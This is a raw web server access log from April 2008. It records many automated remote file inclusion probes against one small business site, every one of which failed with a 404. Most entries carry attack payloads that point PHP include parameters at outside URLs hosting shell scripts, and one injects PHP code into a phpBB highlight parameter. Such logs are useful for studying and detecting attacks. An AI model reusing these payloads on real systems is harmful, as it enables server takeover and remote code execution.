64.185.237.35 - - [01/Apr/2008:01:30:37 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.bsfadvisors.com"
89.149.195.135 - - [01/Apr/2008:01:30:57 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.bsfadvisors.com"
89.149.195.135 - - [01/Apr/2008:01:30:57 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.bsfadvisors.com"
74.50.105.133 - - [01/Apr/2008:01:32:02 -0700] "GET /logs/access_080101.log//admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.75.35.118 - - [01/Apr/2008:01:32:07 -0700] "GET //include.php?path[docroot]=http://www.johan-potgieter.com/bg/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
62.149.36.33 - - [01/Apr/2008:01:32:14 -0700] "GET /auth.api.php?path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.149.36.33 - - [01/Apr/2008:01:33:52 -0700] "GET /auth.api.php?path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:34:40 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:01:35:35 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://elveon.tripod.com/files/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:01:35:35 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://elveon.tripod.com/files/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.bsfadvisors.com"
87.118.102.153 - - [01/Apr/2008:01:36:44 -0700] "GET /index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.bsfadvisors.com"
87.118.102.153 - - [01/Apr/2008:01:36:44 -0700] "GET /logs/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.bsfadvisors.com"
211.239.124.226 - - [01/Apr/2008:01:37:19 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
211.239.124.226 - - [01/Apr/2008:01:37:19 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
211.239.124.226 - - [01/Apr/2008:01:38:15 -0700] "GET /logs/access_080201.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
211.239.124.226 - - [01/Apr/2008:01:38:16 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
211.239.124.226 - - [01/Apr/2008:01:38:16 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
74.54.139.98 - - [01/Apr/2008:01:38:31 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geocities.com/putraaja_85/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.54.139.98 - - [01/Apr/2008:01:38:31 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geocities.com/putraaja_85/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.54.139.98 - - [01/Apr/2008:01:38:32 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://geocities.com/putraaja_85/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:01:38:39 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
213.239.177.121 - - [01/Apr/2008:01:38:39 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:01:38:39 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
213.239.177.121 - - [01/Apr/2008:01:38:39 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:01:38:40 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
213.239.177.121 - - [01/Apr/2008:01:38:40 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
207.61.144.44 - - [01/Apr/2008:01:38:56 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
72.29.75.39 - - [01/Apr/2008:01:40:23 -0700] "GET /logs/modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.64.142 - - [01/Apr/2008:01:40:23 -0700] "GET /logs/modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.75.39 - - [01/Apr/2008:01:40:23 -0700] "GET /modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.64.142 - - [01/Apr/2008:01:40:23 -0700] "GET /modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
211.239.124.226 - - [01/Apr/2008:01:42:11 -0700] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:48:45 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:48:45 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:48:45 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.118.102.153 - - [01/Apr/2008:01:49:49 -0700] "GET /logs/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.bsfadvisors.com"
87.118.102.153 - - [01/Apr/2008:01:49:49 -0700] "GET /index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:51:06 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:51:07 -0700] "GET //config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:51:07 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
216.75.35.118 - - [01/Apr/2008:01:52:54 -0700] "GET /logs/access_071201.log//include.php?path[docroot]=http://www.johan-potgieter.com/bg/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
216.75.35.118 - - [01/Apr/2008:01:52:54 -0700] "GET /logs//include.php?path[docroot]=http://www.johan-potgieter.com/bg/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.93.107.242 - - [01/Apr/2008:01:53:07 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.79.166.69 - - [01/Apr/2008:01:53:48 -0700] "GET /logs/access.log/index.php?page=http://www.health-nutrition-business.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.79.166.69 - - [01/Apr/2008:01:53:48 -0700] "GET /logs/index.php?page=http://www.health-nutrition-business.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:54:06 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:54:07 -0700] "GET //config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:54:07 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
65.55.208.107 - - [01/Apr/2008:01:55:00 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.bsfadvisors.com"
65.55.208.107 - - [01/Apr/2008:01:55:01 -0700] "GET /Old/?N=D HTTP/1.1" 200 655 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:55:52 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.149.36.33 - - [01/Apr/2008:01:56:46 -0700] "GET /logs/access.log/auth.api.php?path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.149.36.33 - - [01/Apr/2008:01:56:46 -0700] "GET /logs/auth.api.php?path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:01:57:40 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [01/Apr/2008:01:58:07 -0700] "GET /logs/modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [01/Apr/2008:01:58:07 -0700] "GET /modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.65.97 - - [01/Apr/2008:01:58:21 -0700] "GET /logs/modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.65.97 - - [01/Apr/2008:01:58:21 -0700] "GET /modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:01:58:38 -0700] "GET /logs/modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:01:58:38 -0700] "GET /logs/modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:01:58:38 -0700] "GET /modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:01:58:38 -0700] "GET /modulesAllMyGuestssignin.php?_AMGconfig[cfg_serverpath]=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
62.149.36.33 - - [01/Apr/2008:01:58:42 -0700] "GET /logs/access.log/auth.api.php?path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.149.36.33 - - [01/Apr/2008:01:58:43 -0700] "GET /logs/auth.api.php?path=http://www.silak.eu//components/com_rwcard/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:01:58:57 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
67.195.44.110 - - [01/Apr/2008:02:00:00 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
67.195.44.92 - - [01/Apr/2008:02:00:00 -0700] "GET /logs/access.log HTTP/1.0" 200 238628 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:02:03:14 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:02:03:14 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:02:03:14 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.107.242 - - [01/Apr/2008:02:04:03 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.107.242 - - [01/Apr/2008:02:04:03 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.107.242 - - [01/Apr/2008:02:04:20 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.107.242 - - [01/Apr/2008:02:04:20 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
68.180.216.109 - - [01/Apr/2008:02:04:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Nokia6682/2.0 (3.01.1) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0 (compatible;YahooSeeker/M1A1-R2D2; http://help.yahoo.com/help/us/ysearch/crawling/crawling-01.html)" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:02:05:06 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:02:05:06 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:02:05:16 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
204.185.158.220 - - [01/Apr/2008:02:05:21 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/emptygold/images/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
207.61.144.44 - - [01/Apr/2008:02:07:10 -0700] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
207.61.144.44 - - [01/Apr/2008:02:07:11 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
69.93.107.242 - - [01/Apr/2008:02:08:40 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.107.242 - - [01/Apr/2008:02:08:40 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:02:10:28 -0700] "GET /index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
82.103.72.218 - - [01/Apr/2008:02:11:30 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
69.93.107.242 - - [01/Apr/2008:02:12:44 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:02:13:52 -0700] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:02:13:52 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
66.249.65.168 - - [01/Apr/2008:02:14:14 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.bsfadvisors.com"
66.249.65.168 - - [01/Apr/2008:02:14:14 -0700] "GET /images/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.bsfadvisors.com"
70.84.191.50 - - [01/Apr/2008:02:15:13 -0700] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.bsfadvisors.com"
70.84.191.50 - - [01/Apr/2008:02:15:14 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.bsfadvisors.com"
74.200.76.146 - - [01/Apr/2008:02:16:48 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.200.76.146 - - [01/Apr/2008:02:16:48 -0700] "GET //skin/zero_vote/error.php?dir=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.200.76.146 - - [01/Apr/2008:02:16:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:02:17:06 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:02:17:08 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
82.103.72.218 - - [01/Apr/2008:02:19:48 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
82.103.72.218 - - [01/Apr/2008:02:19:52 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:02:21:17 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:02:21:18 -0700] "GET //skin/zero_vote/error.php?dir=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:02:21:19 -0700] "GET /logs//skin/zero_vote/error.php?dir=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
70.84.191.50 - - [01/Apr/2008:02:21:19 -0700] "GET /logs/interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.bsfadvisors.com"
70.84.191.50 - - [01/Apr/2008:02:21:19 -0700] "GET /interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.bsfadvisors.com"
82.103.72.218 - - [01/Apr/2008:02:24:25 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
82.103.72.218 - - [01/Apr/2008:02:24:25 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
82.103.72.218 - - [01/Apr/2008:02:24:25 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
82.103.72.218 - - [01/Apr/2008:02:24:29 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
82.103.72.218 - - [01/Apr/2008:02:24:29 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://82.103.72.218/administrator/components/com_db/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
